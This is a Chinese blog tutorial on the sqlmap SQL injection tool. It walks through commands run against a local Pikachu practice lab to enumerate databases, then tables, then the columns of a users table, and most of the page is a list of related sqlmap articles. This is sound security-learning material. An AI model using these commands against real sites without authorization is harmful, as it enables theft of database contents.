【信息安全】-安全工具-sqlmap

最新推荐文章于 2024-05-17 08:23:13 发布
最新推荐文章于 2024-05-17 08:23:13 发布
阅读量1k 收藏 11
点赞数 4
分类专栏: # 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39328436/article/details/114399837
版权

sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞

1.安装

https://blog.csdn.net/u011781521/article/details/53909151

https://www.jianshu.com/p/3d3656be3c60

2.实验

在pikachu实验平台数字型注入中抓包,记录链接以及提交给服务器的参数

读取数据库

在cmd中进入sqlmap的安装目录,输入命令

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>//sqlmap的安装路径

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql --dbs --batch
 //-u 后面接测试链接
 // -data 提交给服务器的数据
 //--dbms 数据库类型为myslq数据库
 //--dbs 列出所有的数据库
 //--batch 该参数使用后不需要用户输入,默认提示走下去

成功获取到数据库名

读取表名

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2"  --dbms mysql -D pikachu --tables --batch

//-D指定数据库
//--tables获取数据库中的表

成功获取表

 

读取列

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2"  --dbms mysql -D pikachu -T users --columns --batch

//-D pikachu 指定数据库
//-T users 指定表名
//--columns 显式列

成功获取列

vector<>
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
【SQLMap工具-1】SQLMap简介及简单应用实例
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9171
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap的安装及使用教程_sqlmap安装使用教程
最新发布
2401_84281648的博客
05-17 1105
除此之外,还可以查询更多数据,如当前的数据库版本、当前的数据库用户、数据库密码等,可以使用不同的命令执行不同的操作。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。然后右键这个快捷方式,点击属性,将起始位置改为你的sqlmap目录,点击确定。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 1万+
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
sqlmap安装详细教程
hibugs
03-07 5756
sqlmap是一款自动化的SQL注入工具,其功能为扫描、发现和利用输入URL的SQL注入漏洞,并且内置了许多绕过的插件,支持的数据库也非常多:MySQL、SQLServer、Oracle,Access等等。
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
sqlmap-master
01-04
标题"sqlmap-master"暗示了我们讨论的是SQLMap的某个版本或者分支,可能是其源代码仓库的主分支。 SQLMap的核心功能包括: 1. **自动检测**:它能够自动识别网站应用的数据库管理系统(如MySQL、Oracle、SQL ...
sqlmap(sqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
同时,掌握好SQLMap并不意味着安全测试就结束了,理解SQL注入的原理,结合其他安全工具和手动测试,才能更全面地评估系统的安全性。 在解压"sqlmapproject-sqlmap-fb3f428"后,你会得到SQLMap的源代码和其他相关...
sqlmap-sql注入工具
07-06
综上所述,SQLMap是一个强大的安全工具,能够帮助安全专家识别并利用SQL注入漏洞。然而,它也提醒我们重视应用程序的安全编码,防止此类漏洞的发生。理解和正确使用SQLMap,既可以提高安全测试效率,也可以增强对...
sqlmap(sqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
在压缩包`sqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip`中,包含了SQLMap的源码和其他相关资源。解压后,我们可以看到项目的结构,包括源代码、文档、示例以及安装和使用指南。通过研究这些内容,我们可以深入理解...
SQLmap
qq_41638872的博客
06-23 1622
SQLmap使用
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
sqlmap的安装及使用教程
weixin_63033353的博客
07-28 4427
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
Sqlmap 使用方法小结
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
SQLMAP工具详解
weixin_56218159的博客
06-02 5890
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
sqlmap的安装与使用
qz362228的博客
08-13 9897
sqlmap的安装和使用
史上最详细sqlmap入门教程
weixin_44867191的博客
05-16 1万+
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
SQLMAP安装及使用教程
qq_45785324的博客
07-08 1万+
sqlmap安装及使用教程
Web应用安全:Sqlmap用法介绍.pptx
06-20
接着,使用Sqlmap工具,通过cmd命令行或交互式界面,获取目标站点的URL和可能存在的cookie信息。然后,利用Sqlmap对站点进行SQL注入攻击,识别和利用漏洞,展示如何获取敏感数据或执行未授权操作。 通过这个资源,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

vector<>

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值